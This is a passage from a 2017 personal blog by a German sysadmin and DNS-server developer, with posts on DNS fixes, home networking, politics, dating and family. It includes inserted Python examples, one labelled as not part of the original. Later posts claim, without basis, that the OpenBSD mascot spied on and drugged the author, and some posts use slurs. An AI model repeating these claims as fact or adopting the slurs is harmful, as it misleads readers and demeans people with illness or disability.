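    ("ns1.zone.tld", "A", "192.0.2.53"),
    ("www.zone.tld", "A", "192.0.2.80"),
    ("_25._tcp.mail.zone.tld", "TLSA", "3 1 1 (constructed digest)"),
])

if __name__ == "__main__":
    for qname in ("_25._tcp.mail.zone.tld", "_tcp.mail.zone.tld",
                  "mail.zone.tld", "_udp.mail.zone.tld"):
        print(qname, "ENT-aware:", ZONE.lookup(qname, "TLSA"),
              "owner-names-only:", ZONE.lookup(qname, "TLSA", ent_aware=False))
```

A resolver that applies RFC 8020 may cache an NXDOMAIN for `_tcp.mail.zone.tld` and stop asking for `_25._tcp.mail.zone.tld`, which is why the wrong rcode matters beyond the single query.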



Obama, why not pardon Chelsea Manning?

January 8th, 2017

Chelsea Manning is still imprisoned. Why doesn't President Obama pardon her? There is one week left to do that. Act now!



After fixing NODATA of ENT names...DNSSEC breakage

January 10th, 2017

My DNS server delphinusdnsd is currently broken in NOERROR reply when dealing with ENT (empty non-terminal) names in DNSSEC. I'm working on the issue after having tested ENT additions, and hope to finish by the 28th of January. If not then the 1.1.0 release will have to be postponed. These ENT fixes as explained in RFC 8020 are an absolute must for a DNS server and I have to fix it.



Short Weekend

January 16th, 2017

A hard drive died at work and re-ordered my weekend in such a way that I did not sleep at my parents', which I usually do. I had to get up at 5:35AM this morning to assist the remote hands to swap the failed drive. Ahhh. The life of a sysadmin, when shit breaks. And shit will break. It's just a matter of time.



Blog outage

January 18th, 2017

This blog was down for 24 hours because of the power outage in Amsterdam yesterday. Even though my VPS came back yesterday I forgot to check the PHP scripts and just noticed it was down. Sorry for the inconvenience. I have taken steps to make sure that php55_fpm gets started right after reboot. It was a badly named rc script.



Thank you President Obama! Chelsea will be released May 17th

January 18th, 2017

Chelsea Manning has all the reason to celebrate today because her days in prison are numbered. Before her sex change she was named Bradley. I have dug up this photo of her from an article from September 3rd, 2011.

If you don't know what Chelsea did it was like this. In the war in Iraq a family of children and women and a man were shot up by a helicopter gunship. It was gruesome to watch, and it was Chelsea that released the video to the public. Chelsea sat in prison for someone else (the pilot), is my take on it. Anyhow leaking such material from the military is not undangerous, as you can see Chelsea sat 6+ years in prison. She tried to commit suicide and did a hunger strike. All that will be past soon but the scars remain and will need healing.



After 8 years presidency Obama becomes ex-president

January 19th, 2017

What did president Obama mean to me? He was the first black US president many said but he had a white mother so that makes him half-white. I realise he had no luck with the senate which was mostly Republicans and there was a time when I thought that many decisions done by the senate were racist in contrast to president Obama's vision. One thing which he did not achieve was closing Guantanamo Bay (gitmo). I'm not sure if he tried hard enough on that, or if he was ignored by the military. I used to dream of US presidents a lot because of their exposure in the news. The last dream I had of Obama was during the Ukraine crisis so in 2015. President Obama closed the US Army Garrison in Schweinfurt, Germany where I live. There were 2 bases here and in hindsight it was a good thing that the military moved out. We are a strictly civilian town now. And the bases were reused to house refugees during and after the 2015 migrant crisis. When I told someone on a train in Canada who was a US citizen that our bases were going to be closed, the response was "why are they doing that?!" that was in 2013. When I replied "Obama", he said "makes sense". I think I was taken out of context though, I have nothing against Obama at all. Compare him with all the previous presidents dating to Reagan, he was probably the best of them all. Now in terms of globalisation I feel that Obama was a little reserved, he tended to want to isolate the US. His successor is a real isolationist so Obama was hardly isolationist compared to what we think Trump is. I'm glad president Obama pardoned Manning. Too bad he didn't intervene earlier. But he is a president that tries to go by the rules as much as possible. In this case he could have bent the rules more, no one would have objected. All in all I think Barack Obama served the American population well, from an outsider's viewpoint. I will miss him.



Electricity for 2016

January 19th, 2017

I come through with reduced energy, even though I pay more this year. This is because the costs per KWh went up.

Year    Night   Day     Total
2013    6941    1276    8217
2014    6906    1323    8229
2015    10151   1452    11603
2016    9643    1420    11063

The apartment was mostly heated and not once did I freeze that I can remember. But it would be nice if the 2014 Night values came back :-).



Fan of flying machines

January 19th, 2017

When it's day I look out my window a lot. I enjoy watching the pigeons do their formation flying. And sometimes... I get this:

If you enlarge the image you may see more. It is three Apache gunships and one Chinook (so I call them) that is a troop transporter for 25 or more fully equipped troops. Anyhow these make a hell of a noise when they come around so I was able to snatch a few pictures.



Delphinusdnsd will be released in roughly 4 days

January 23rd, 2017

I'm putting the last few changes in to make this software ready to be tagged and put up for download. If you'd like to beta test you have roughly 4 days to grab a snapshot and try it out. So far I've tested this on Ubuntu, Raspbian, OpenBSD, NetBSD, FreeBSD and OpenSuse, and it seems to work. The new release will be version 1.1.0.



First mesh in Schweinfurt/Deutschhof

January 25th, 2017

Schweinfurt got the first mesh between two non-associated parties (me and the bakery Höreder Beck). As you can see on the yellow link, there is a medium quality link there. However the link does disappear a lot due to interference. I'm hoping on putting up a relay which is coloured red across the parking lot, which shortens the distance to both endpoints. Hurrah Freifunk!



Delphinusdnsd 1.1.0 released

January 28th, 2017

Finally I tagged the tree and made a tarball. The news at delphinusdns.centroid.eu say the following:

DelphinusDNSD 1.1.0 has been released on January 28, 2017. New is a 
dd-convert.c C program that replaces the ruby tool with the same name. 
Also I have fixed Empty Non-Terminal (ENT) Names in this release, meaning 
earlier version likely give wrong answers on the Internet. You can get 
the source under the "Source" link. Mac OS X port has been dropped.

I'm glad this last year's efforts were finished in time. Now I'm gonna rest it a little and figure out where in what area I have to put my efforts next.



Switching Internet Providers

February 9th, 2017

Today I got a package in the mail. It was from Telekom.de. They sent me a new set-top box for my TV. Also they sent me login credentials to their network. On Monday next week my modem will likely go offline either before I'm home or just after, and I'm going to put my new VDSL modem to use. I upgraded the OS on my routers gamma and venus, so that they won't be panic'ing on igmpproxy which is needed for the Telekom IPTV. I got everything prepared. Monday is the big showdown though. I'm very excited as I'm going from 16/1 to 100/40 and I was hurting on the upload at nights. Better soon come!



Updated Network Map

February 9th, 2017

I have updated the Network map on how my network will look after Monday:

[gaia]--                    [raspberry pi]
          \                      |              [mercury]
[phone1] - \                     |                  |
            --- [uranus] === [Access Point] --- [gamma] ---- to pppoe cloud
[phone2] - /                    |
          /                     |
[beta]--                        |
                             [venus]-+--[spica]
                                ||   |
                                ||   +--[fritzbox LTE]------- to LTE network
                                ||   |
                                ||   +--[Telekom IPTV]
                                ||   |
                                ||   +--[Samsung TV]
                                ||   |
                                ||   +--[saturn]
                                ||
                             [freifunk]

New is that I drilled a hole through a wall for a cat5 link between access point and venus. I have also laid conduit for 2x 10 meter cabling for the TV and the IPTV set-top box. One thing that is funny is when I'm connected from beta to supercluster which is on the Internet, and I reboot venus, then the connection will drop between supercluster and beta. I haven't figured out why yet though. There is an IPSEC tunnel going from beta via uranus via gamma to mercury, that IPSEC's the part going over wireless. It too doesn't touch venus, so mega weird.



Munich show a little more respect to Linux

February 10th, 2017

Linux for the city of Munich was innovative and popular. Now the CSU and SPD municipal government wants to turn back the clock and go with Microsoft products again. They forgot the lock-in they were in before. All over Germany people said "you should go to Munich" if you had anything to do with Linux. Such a movement should be rewarded not punished by tearing it down. They say that Microsoft is the standard. Well, to be honest I haven't used Microsoft products for over 20 years. I often can't find work when I'm looking for new work, perhaps because I didn't buy into the Microsoft hegemony. Those that use alternatives should be rewarded for being different in my opinion. If you saw the business opportunities the alternatives can create you'd want the alternative too. Microsoft is a dead-end. Anyhow shame on the Munich municipal government for their wrong decision.



I switched Internet Providers

February 14th, 2017

M-net was my old provider. They changed around 5 years ago and didn't give out goodies such as static IP's. That peed me off enough that I decided to switch; the competition has all the stuff they have by now and more! I get VDSL2 now and get 100/40 speeds (more like 102/38 but meh). All in all I'm happy with this move. Unfortunately the new IPTV won't work on my network, I'm hoping to be able to give it back to the ISP and get a discount for just IP and SIP phone service. I still have to connect my SIP account but that shouldn't be so hard.



Why I won't be renewing my Parship.de membership

February 17th, 2017

Parship.de is a matching/dating service. After one year and 500 EUR or so, I do not think I got the best service in the country. In fact I feel parship got a free ride off my money. Like I told my mom I'd have a better deal with a hooker for that money than get to look at the blurred out pictures of parship. Unlucky for me I don't really believe in hookers. So I had one person who I even talked to in messages there, no one else was interested in me. And she was an 80 out of a possible 117 points, so rather a bad match. They base these points on some psychological profile and try to match strengths with weaknesses. She stopped talking to me just before Christmas right after I told her I had visual hallucinations before, I'm quite honest about my mental illness. Hiding from myself rests on my conscience and I can't go through with it. I like to be as honest as possible. In this case the person I talked with wasn't interested in psychos. How boring.

So I won't be renewing and I have already cancelled. Also I have noticed whenever they tried to match me with someone else the other party was fat like me. Just an observance.. mix all the psychos with the psychos, the fat ones with the fat ones and the coloured with the coloured ones is the impression I got from that. In the end the skinny, white and truly pretty people can continue their games of cheating, lying and using others. Go ahead.. not my game! I can't lie I'm attracted to normal sized women as much as anyone else. I'd date a fat one too but I feel the algorithm chose them for me because they were fat, and I'm sorta sick of that. In many cases, like in mine, being fat is not our fault but a side-reaction to medication used.

Also I sorta missed the bus. If I meet someone and we possibly marry and have kids... what worries me is that at older age there is higher chance of Down syndrome for the babies, so I looked for women mostly 8-10 years younger than me. And it felt weird because these women were just getting their lives going and I felt I wasn't on their wavelength. It just didn't work out. I'm glad for all those couples that met online through a matchmaker, but for me it wasn't great. I dunno I don't think I'll ever marry or have children anyhow. And getting into a relationship with someone who has kids...well that's too hard for me to follow through with. I don't want to use them because they're desperate finding a partner that can raise their kids, and it's too much of a burden for me as well. I'm a big baby myself and needn't be an extra chore for someone with a lot of chores. So meh. Forever doomed?



Jobless despite Certification

February 21st, 2017

Golem.de (a news portal I read) reports that a 36 year old IT pro with system admin certifications and 10 years experience can't find work. Hear, hear! I believe it as I'm unofficially looking as well. Problem is that the golem article says that 3000 such sysadmins also can't find work. It makes you wonder what is going on here?

We get Linux certified and can't use our skills? There are 50,000 job postings for IT jobs, why do 3000 people have to be out of work? The industry has not adjusted to what people are being trained on. Give us Linux jobs! Give us UN*X jobs! Also I would like to have the government probe into workplaces that are just faking job postings. To gain information for statistical purposes and advertising. If that is the case it should be highly illegal.



ZeroPager.de domain about to expire

February 21st, 2017

I registered this one either last year or the year before as a test domain. It served its function well. I'm letting it expire.



Networking Plans for future Computers in my Home

February 24th, 2017

I'm hoping to replace everything (everything!) in my house with 10 Gbit Ethernet equipment by/at the year 2020. For those equipments with many ports I have planned to get a high-end NUC or so and a switch that does VLAN'ing. My personal preference for such a switch is 8+ ports and 22 watts power consumption or so. I've seen some switches that do 40 watts and that's too much for me. The cables will have to get upgraded too as they are cat5e standard, and I believe 10gigE requires cat 6 or 7. At least the countup of all of this is gonna be easy. These are my dreams for 2020 anyhow. There are 3 years to go, and I know I'll get cravings to get new equipment in between that. I hope I can stay disciplined enough.



Four years in this ol' place

February 24th, 2017

I forgot to say...I am now four years in this apartment. Time has really flown. It's almost as long as my last apartment, which was a long time. I'm hoping on staying in this apartment beyond 2020. Unless I get other opportunities.



My first SIP ALG program

February 26th, 2017

ALG is a VOIP term and means Application Layer Gateway. I have created in the last week a SIP ALG program that I call rtptrack. It makes sure that outbound (inbound untested) calls work on the t-online.de network. The router I use is OpenBSD with the pf filtering system (which is supreme!).

The reason that t-online.de did not work with its existing setup was that they don't utilize an "rtphelper" algorithm which helps RTP punch a hole into a firewall. Sipgate.de and the VOIP company I work for do this and their setup just works (tm). RTPtrack should make Telekom work too. Finally something there works!

The download is here for a limited time.



Ditch the Computers for Elections!

March 4th, 2017

It's too bad what I'm about to say. But computers of today are not secure enough for today's election (!!!). A white hat hacker in the Netherlands agrees and has facts why. His story is at soylentnews.org. Computers these days are a joke and I'll give you another example. I bought a computer in 1997. It was the cheapest of its kind for $850, and they really skimped on the parts. That same computer would be worth $1,240 today with inflation. But we can buy PC's for $300 so they really got a lot cheaper and/or skimped on the parts (and polluted rivers in China). We know they skimp on the parts because computers have not become inherently safer. In fact they are faster but brain damaged. So it's no surprise that security software often slows computers down. (Why is that?!) It's because security requires processing in order to make smart decisions! I'll give you one example. The ISN of a TCP session in OpenBSD uses the cryptographic routine called arc4random(). Do your homework why this is important (see /usr/src/sys/netinet/tcp_subr.c - function tcp_set_iss_tsm(), an RFC 1948 is quoted in the comments). So while computers have gotten 4 times as cheap over 20 years, they haven't changed in design. This is too bad, this must change! In fact I'd expect a computer to cost more than $1,240 if it were anything more than crap!



When I fell into the EU's lap, or, what's wrong with you?

March 5th, 2017

When I left West Germany as a child to live in Canada for a decade and a half, I left not knowing about the EU. I retained a German passport however and returned to now-united Germany in 2002. In fact in 2002 I don't remember using the DM anymore and it was the Euro. The EU was big in population. Real big. Bigger than the USA, and I had to get to terms with that, that I'm now living in a 500 lbs Gorilla superstate.

Sooner or later I began to like what the EU allowed me to do. I took on trips to France and the Netherlands in the next decade, without needing to go to customs or money exchanges, and it was a great feeling. It was like something directed me into place that I was a European now and not just a German citizen.

I also considered taking a train to London via the Channel Tunnel right from home and considered the route on bahn.de. Unfortunately with Brexit I'll have to delay that London trip a little bit. I don't feel comfortable with customs at all. We should live in a borderless world. Really! And we should become world citizens. But it will have to be European as a first step.

Don't get me wrong. I too have had my share of hard times being unemployed for 7 years at a length, in Europe. It may seem sometimes that Europe is not able to compete with itself for jobs. But at the same time we're getting richer as a community so the money goes somewhere. I'd say look not at globalization as the culprit but the un-equal structures that evolved before states united into the EU.

We have to make the EU great. And not again. Because we were never great. We're in our infancy and the six founding members of the EU, of which Germany (West) is a part of, needn't try to break up this once in a lifetime opportunity. We are the core, we should set the examples for the rest of the EU.

In the past I have seen an unseen hand of the Internet try to downgrade the EU. Try to sever our bonds from far. With me that doesn't work; however, I see much to be desired for when it comes to the number of crisis situations that we have to endure. I'd like to see us become closer tied in the future. That means not just internal affairs being handled in the EU but also that we have an arm of external affairs and handle those. Only then can the EU defend itself.

Germany is having an election year this year and I do intend to vote for a pro-EU and pro-solidarity party. Have a nice day.



The car I intend to buy

March 5th, 2017

I've not had a car since 1993, so close to 25 years. Back then I had a 1987 Dodge Shadow (turbo). And after moving to a metropolitan area of 4 million or so inhabitants (rough estimate), I preferred taking the subway, bus, or even go about by bicycle. Since I've been working at a job in the VOIP industry for close to 7 years now, I've saved up my money. And I'm finally wanting to spend that money again. First I wanted to invest it into a business, but that is harder than you think. I'd rather get a car now and I've set my eyes on an electric car. Particularly the Renault Zoe. I've fallen in love with that little car, even though I haven't driven it yet. Should be interesting taking my first ride in it. With the car I'm going to get a few other gadgets. For example a cell phone. Yep I haven't had a cellphone for close to 15 years now. I'll need it to call emergency services when my car has problems. Also I do want to pursue astronomy more and perhaps get a Newton or such scope. With a car I can put it all in the trunk and drive to locations where it's dark enough. I don't know what it is but it seems I've been granted a new stage in life from a very skimpish lifestyle to being normal. I'm just soaking it in, and spending the money I acquired over the years. Should be good.



New VPS

March 7th, 2017

I know I have a lot of these but I really need one over in Canada. It's a $10/mo DigitalOcean VPS in Toronto. I hope it sees use.



The North Sea's deepest point

March 8th, 2017

In the North Sea, north of Germany, there lies not far from Norway the Norwegian Trench. It is as deep as 700 meters. This is the only point where the North Sea is 700 meters so it makes sense that the Norwegian Trench is the intended place for these "power" spheres that are pumped storage facilities, as the Fraunhofer Institute for Wind Energy and Energy Systems Engineering has envisioned. So I looked a little at this. I tilted my head a little and thought, that would make an incredible underwater replenishing station for submarines. If enough power spheres are made it won't be immediately noticeable that they would repurpose some to be hydrogen storage containers. Hydrogen? What for? Well if you haven't heard by now Type 212 submarines of the German Navy use hydrogen to get their power. And did Norway have the same subs? Well yes. They just ordered a batch of four from Germany last month. So there are the operators of the replenishing facility. Only problem is: Can Type 212 subs dive to 700 meters? And I checked on Wikipedia and the answer is, yes. So perhaps there is a military mandate as well as the economic mandate for these power spheres. I gotta admit I really used my imagination to the fullest here, and used Wikipedia to back up hypotheses. Would be something right? If there was a submarine base just off Bergen? BTW Bergen is strategic, in all my games of the submarine simulation "Red Storm Rising" as a youth it was the Soviets that would capture Bergen first and a submarine had to stop the landing crafts. It was usually that the Soviets succeeded in taking most of Norway and Germany, so if that's in simulations it must have been a fear. Red Storm Rising was a game that probably had navy advisors as common knowledge would have never been enough to make that game as real as it is.



OpenBSD 6.1 will be released on May 1st

March 8th, 2017

Once that release is done, I'll be upgrading computers around here, and I'll get a new domain too, as I want to run delphinusdnsd in production somewhere with a test domain. I have the capacity to do this now with the new VPS. Also I've been thinking around how to better the database with delphinusdnsd which uses BerkeleyDB from Oracle as its underlying database. I may have to rewrite the database entirely and make a shared memory hash table. Time will tell and it will tell if OpenBSD will upgrade BerkeleyDB or not. Currently I believe it's at 4.6.21p3.



A thought just came...are humans in the way?

March 12th, 2017

Brexit came at an interesting time. This time we realise that human resources for labour are starting to dwindle. This is not because of a lack of humans. In fact we have more humans than ever. But I'm talking about automation. About a decade ago I attended gatherings of laid-off personnel and other job seekers and I remember one lady was among the first victims to digitalization. She was a photo developer working for Kodak or some company, and was laid off because digital cameras replaced analog film cameras. I predict in a decade or two time I will again be visiting those meetings as the System Administrator who was replaced by Artificial Intelligence.

Then there is Great Britain whose humans voted for exiting the EU. This can be a chance for Britain to up its manufacturing as automation only and to develop its AI backed with quantum computer technology. A quantum computer on that small island is almost a saviour when comparing the island with the human resources of the continent Europe. Britain can enter as a guardian and security analyst by checking Internet traffic that transits its country en-masse with artificial intelligence and quantum computers and thus it might get a pretty good picture of what a single firewall state or flow is about to do. It can then sell this information to 3rd parties or governments. What this leaves the British public with is unknown. Either everyone is gonna travel the world and hardly be home while computers do all their work, or they'll be locked up in their house and using virtual reality to entertain themselves. Would this create a nation of VR addicts? Is that life really satisfying?

And lastly I want to throw in why basic income is perhaps a good thing in times where industry is automated. We should be pursuing a model for humans that allows us a satisfying life (since our economy is rolling) and much like in the series Star Trek TNG humans try to better themselves intellectually and spiritually. Unfortunately the speed at which automation happens is faster than the speed at which politics are realising that humans will be out of work and temporarily or permanently depressed about this state. We need to make it clear that yesterday's politics need to be replaced by today's needs.



Replaced SPF with TXT records

March 12th, 2017

;; QUESTION SECTION:
;centroid.eu.			IN	TXT

;; ANSWER SECTION:
centroid.eu.		86400	IN	TXT	"v=spf1 ip4:108.61.211.139 \
ip4:78.47.14.22 ip6:2a01:4f8:d13:1980::/64 \
ip6:2001:19f0:6c00:9041:5400:ff:fe11:3332 ~all"

I did this change because RFC 7208 section 3.1 says that SPF records were discontinued. Finally someone told me! lol.
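How a receiver that follows RFC 7208 reads such a policy, as an added example that is not part of the original post: only TXT records beginning with v=spf1 are considered, a policy published solely under the old SPF record type is not seen, and the ip4/ip6/all terms are then matched in order. The function names are constructed for illustration, the record is the one shown above joined onto one line, and mechanisms that need DNS lookups (a, mx, include) are deliberately not handled.

```python
import ipaddress

RESULTS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

# The TXT record from the post, with the line continuations removed.
PAGE_RECORD = ("v=spf1 ip4:108.61.211.139 ip4:78.47.14.22 "
               "ip6:2a01:4f8:d13:1980::/64 "
               "ip6:2001:19f0:6c00:9041:5400:ff:fe11:3332 ~all")


def evaluate(policy, client_ip):
    """Match client_ip against the ip4/ip6/all terms of one SPF policy."""
    ip = ipaddress.ip_address(client_ip)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                 # ::ffff:a.b.c.d is matched as IPv4
    for term in policy.split()[1:]:         # skip the "v=spf1" version term
        qualifier = "+"                     # default qualifier is pass
        if term[0] in RESULTS:
            qualifier, term = term[0], term[1:]
        mechanism, _, arg = term.partition(":")
        mechanism = mechanism.lower()
        if mechanism == "all":
            return RESULTS[qualifier]
        if mechanism not in ("ip4", "ip6"):
            raise NotImplementedError("needs DNS lookups: " + term)
        try:
            net = ipaddress.ip_network(arg, strict=False)
        except ValueError:
            return "permerror"
        if net.version != int(mechanism[2]):
            return "permerror"              # e.g. an IPv6 prefix under ip4:
        if ip.version == net.version and ip in net:
            return RESULTS[qualifier]
    return "neutral"                        # nothing matched and no "all"


def check_host(rrset, client_ip):
    """rrset is a list of (rrtype, text) pairs published at the sender's domain."""
    policies = [text for rrtype, text in rrset
                if rrtype == "TXT" and text.lower().split()[:1] == ["v=spf1"]]
    if not policies:
        return "none"                       # includes "published as type SPF only"
    if len(policies) > 1:
        return "permerror"                  # more than one v=spf1 record
    return evaluate(policies[0], client_ip)


if __name__ == "__main__":
    # 192.0.2.10 is a documentation address, used as a constructed outsider.
    for addr in ("78.47.14.22", "2a01:4f8:d13:1980::25", "192.0.2.10"):
        print(addr, "TXT:", check_host([("TXT", PAGE_RECORD)], addr),
              "SPF-type only:", check_host([("SPF", PAGE_RECORD)], addr))
```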



Let's just end this here

March 14th, 2017

Turkey is just using Germany and the EU, to get support for its already anti-EU course. Why should they be in the EU? They shouldn't. The differences between Turkey and the EU are too great. Turks might feel offended by Europe's stance, but this is not your country that you pledge allegiance to! Unfortunately we have to watch all the human rights abuses come out of Turkey, just to prove a point that they are different. Why do we need them in NATO? How strategic is a dictator run Turkey to NATO? We don't need them! Let this end. It's better this way.



We're 10 cm's from the Sun (1mm)

March 16th, 2017

I saw this YouTube clip partially until he set the distance to Jupiter. If the Sun was 1 mm in diameter (radius off Wikipedia says 695,700 km) then the Earth's to-scale distance I worked out to 107 mm or 10.7 cm given that the distance of an astronomical unit (AU) is 149,597,870 km. In the video astrium goes on to say that Mars is 16 cm's from the Sun. I proofed the distance with Earth today and had some discrepancies until realising that 2 * radius == diameter. :-)



The only way to outdo Facebook/Google/Silicon Valley and Co.

March 19th, 2017

When European politicians talk about restricting Facebook for example, it won't do. The only way to beat Facebook and apply European law is to create a competitor platform that offers more than Facebook, ie. competing against it. We are eons behind in this so it's not easy to outdo Facebook and Google. But if politicians would have the will to work with private enterprises to create a competitor platform by investing billions (that's how much it would cost), then and only then will the European user be under a European law-umbrella.

Politicians don't realise this though. They think it is sooo easy to create a digital border in "cyberspace". It won't do. Half the people on Facebook are addicted to it and emotionally bonded to it. The only way to break the spell is to break it with another spell, like mentioned above. With European law there must come law evolution meaning that some laws are perhaps not in Europe's best interests, and serve only a minority. Anyhow. Here is a question to local politicians then "how long will Europe have to be beaten technologically for you to realise politics can't save us?". Put up.



Tomorrow is Equinox

March 19th, 2017

At 10:28 UTC is equinox. That is when the sun crosses the equator of Earth. You may have guessed then, that this only happens twice a year. Officially after the sun crosses the equator in either direction somewhere on Earth it is spring and otherwhere on Earth it is autumn. Namibia is starting autumn, and Germany is starting spring. That's just how it is in the March equinox.



When Algorithms Fail Humans

March 23rd, 2017

I sent a resume to some place that was hiring. Their algorithm scored my mail as a spam mail due to the .pdf attachment that was my resume. I sent a followup a few weeks later asking if they saw my resume and by then they realised that my mail was not spam. Unfortunately for me, the position for the job was then already filled. I believe this is one case where an algorithm failed humans. Or is it sheer bad luck? Between the mailings I changed my SPF record to a TXT record as per RFC 7208, which changed in April 2014 and my anti-spam setup was outdated.



Last night Europe turned on Summer Time

March 26th, 2017

When I type date on a UN*X system it says this:

Sun Mar 26 10:52:20 CEST 2017

Ahhh! Finally summer time CEST! I was once vehemently against the switch at all, but now I just don't care anymore. It would be nicer to have no summer time but then again, who cares!



Ex-Ledward Barracks starting to be demolished

March 26th, 2017

On December 9th, 2014 I reported about the American Forces leaving Schweinfurt. Now there is the first demolishing of the old Barracks I just read in the mainpost our local newspaper. They have designated the east wing of the barracks for schooling, in particular the local college FH Würzburg-Schweinfurt. I haven't seen it in real life yet but I'm sure one would not recognize it again. Strangely I read somewhere a few weeks ago that the US Army is seeking for new Barracks in Northern Germany. That is ex-british territory in the division that happened after WW2. I disagree with President Trump that Germany "owes" the US money over protection. The remaining US forces in Germany are remains of the second world war of an invasion force, why would we pay a cent for that? Why we'd be crazy. Our military can be modified to give us a reasonable protection without NATO forces on our soil, and in a jiffy at that. Anyhow "interests" cost money so much is clear. And it's in the US best interest that Germany doesn't get invaded by the Russians even if Germany doesn't pay the Trump government. In regards to conscription which is something Sweden re-introduced recently, there is probably a chance that Germany will re-introduce it too in the foreseeable future to come. This is simply because when forced there are more potential good soldiers that become "career" soldiers. Currently the advertising of the Bundeswehr is probably not effective in finding the right persons. That's just a prediction of mine, as I don't really know as I never had to serve because I lived in a foreign country at the age when people get conscripted. So I barely missed out.



What science should focus on in my opinion

March 27th, 2017

Science in all of history has largely been a trial and error method. There was a hypothesis and if some work surrounding that hypothesis matched then there was material for a positive conclusion. In these days we have a great system of many many hypotheses and we get a bit of positive conclusions out of it.

I personally get angry when I see people working with rare elements and "waste" their time with it. Such as gold. Why gold? Just because some guy put it on his crown and shield and it looks nice why do we waste our time with it? It has no value to me.

I personally would like to see scientists try out the most abundant elements that we have on earth (32.1% iron, 30.1% oxygen, 15.1% silicon, 13.9% magnesium, 2.9% sulfur, 1.8% nickel.. stop). Let's work with the ones that are over 10% so iron, oxygen, silicon and magnesium. Also we should look to the Universe and see what elements are abundant there. Hydrogen and Helium. So we have six elements that we should be focusing science around. Forget the rest they aren't important enough! One element we could be working with is Carbon but let's keep it at that. So seven elements in total.

I have dug up this chart from wikipedia which I find pretty interesting:

We should be doing science with the most abundant of elements because there may come a time when we're short of everything and can only use what's immediately available. Does it not make sense? To me it does.



Totally disagree with this SP.ON. article

March 27th, 2017

In this article on Spiegel Online the author fingers the EU and US industry at trying to weaken Germany. Dieselgate is the cause of that, but it was brought about by whom exactly? You got it. VW. And then he goes on to say somewhere in the article that up to 2 million people are indirectly dependent on the car industry and that if everyone bought an electric car that there would be job losses because the car makers are getting less money per e-car than any other emissions car. Now, I've been on the search for an electric car for the last little while and I smell hot air from this guy. For one, an electric car costs three times as much as its emissions counterpart (Renault Zoe vs. Clio) with batteries included. So if the producers aren't pocketing great profits on this I'd be surprised. The fact that I mentioned Renault (a french maker) is that it's still cheaper than the german competition (Opel e-ampera, BMW, and VW E-Up and E-Golf), yet it's still expensive. Maybe he overlooked that many people want an electric car in this country and that the local automakers are letting us down. They slept, they lied and played with fire at dieselgate. And we're supposed to feel sorry for job losses? We should buy a friggen emissions car to keep some assmunch in their job and all they do is turn around and lie to us? No. I totally disagree with this guy's sob story and I'll buy me a Zoe from surprise surprise not the korean dealer but the next neighbouring country over. VW should roast and pay up, because VW not only tarnished its own leadership, engineering and staff but also all of Germany's reputation of honest craftsmanship and engineering. You guys can bring all the sobstories you want, you don't get me feeling sorry for you.



Turned down the heat

March 27th, 2017

My "Nachtspeicher" heating system is turned down to 2 hours now, and I have set the setting on the units themselves to level 1. I hope I don't freeze, but today is extraordinarily warm in my apartment.



Reinhard Tgahrt, Rest In Peace

April 1st, 2017

Sadly, not an April Fools joke. Reinhard Tgahrt my uncle passed away last night. He would have been 81 years old on July 4th. What can I say here? Reinhard was an interesting person and a great uncle. He lived in Marbach not far from his workplace the Schiller Archive and Museum. I believe he loved his work. He loved poems and not just simple ones. I would recite one he said but I don't know where to look all I remember one he said was called "Endlich". I think I could dig out a long list of things he contributed to in Germanistics but it's all online. He was a great person, and I'd toast to his life with a pistachio that he loved to eat so much. I'm gonna keep it short so I'd end the conversation quickly like he always did with a simple, Adieu!



I've left parship.de, unsuccessfully

April 2nd, 2017

Well I've asked parship.de to delete my profile. I never had any luck finding anyone, since becoming a premium-member last april 6th, 2016. I think the service is a scam personally. Thanks for nothing, and they're expensive too.



My Bloomin' System

April 3rd, 2017

Spring here has arrived. When I look out my window, I see this:

Of course it looks a lot better than in the photo IRL.



I'm ready to go back to dating

April 5th, 2017

After leaving parship.de a thought came to me. Why do I need a middle man to ask someone out? I have registered schweinfurtdating.de and put myself on it. If anyone comes across it they can e-mail me if they find me interesting. I also want to give others the chance of presenting themselves on this website. I hope I don't get swamped with the workload. Instead of 500 EUR for parship.de I paid 5 EUR for the domain, and I have enough resources to facilitate a bit of webhits. If it gets too bad I'll move the website around my VPS's a little to balance the bandwidth. Here is hoping that I'll have a gf in 2017. :-)



I identify with Goldflipper from OpenBSD 3.2 Release

April 8th, 2017

I identify with goldflipper. That's why I even registered the domain goldflipper.net before. If you may know Puffy dressed as 077 (ascii sign for '?') as a dupe to 007 (james bond) destroyed goldflipper a cyborg made by "the doctor". There are several hints that goldflipper is me. 1. Flipper is a common name for my last name as a word of taunt. 2. My dad is the doctor and was called so at his work even. 3. When I left Canada as my place of residence after having a very hard time in Ottawa, OpenBSD 3.2 came out with a taunting "goldflipper is gone". Just for your information puffy did not destroy goldflipper, but rather had him go back to square one, for repairs.

I didn't even know what hit me, and I sure as hell did not expect puffy to take me out. All is good now, I know now where puffy stands, not only did he do Goldflipper but also came out with Blob in 3.9. Keywords bonding 3.2 and 3.9 are again goo and doctor. Check the lyrics and compare (in this link). I don't think I'm mistaken, puffy did his homework through some sorts of spying, he was very informed about where I came from and about my family. No one would have known about "the doctor", I never told that to anyone until recently.

So where does that leave me? I'm old now compared to these younglin's and fairly retarded due to the meds I'm on. I'm not even gonna counter-attack I don't think. I'm just deeply hurt that puffy took me out. Now I'll give you another piece of the puzzle. I once taunted puffy with means of a donation, where I provided a small poem pitting the city of Toronto against the city of Calgary with its pathetic mayor at the time Ralph Klein. Then again at the time Toronto had pretty dull mayors too, I think it was NOOOOOOBODY's Mel Lastman. It may seem like fun and all, but let this be a warning to anyone in Canada before you get into a spat with someone. Especially immigrants who don't have a status beyond landed immigrant should watch out. Puffy throws acids such as LSD!

Very low. Very low. It was a blow, deep below the waist
But make no haste, we know without a doubt that puffy was the taste
And let this poem stand, for only one ruler rules the band
the devil with his left-side glory does not control the sand
Because sand is made of rock, and rocks are forever
And this connection from near and far will never sever
For a tear from my eye will fall and drops will appear as ice
cling cling clang rattle bing bang I'll make my noise all winter
spring, summer and fall, you'll never get me all, I'm out.

Puffy may have a sample of blob, but I have sample of bluffy!



First draft of the Goldflipper story

April 11th, 2017

(pictures and illustrations to come later)

A long time ago.. more than one revolution of Jupiter around the Sun, puffy who was notified by octupus that goldflipper is its foe, which was a blatant lie, destroyed Goldflipper and told the story in song, as a taunt.

When Goldflipper the cyborg was "destroyed" by octupus and puffy, it was able to catch a flight to India on a TWA airliner. Just before reaching the EU for a refuel stop goldflipper released itself from the airplane and dug into the North Sea and dug deep into the sand near the Norwegian Trench.

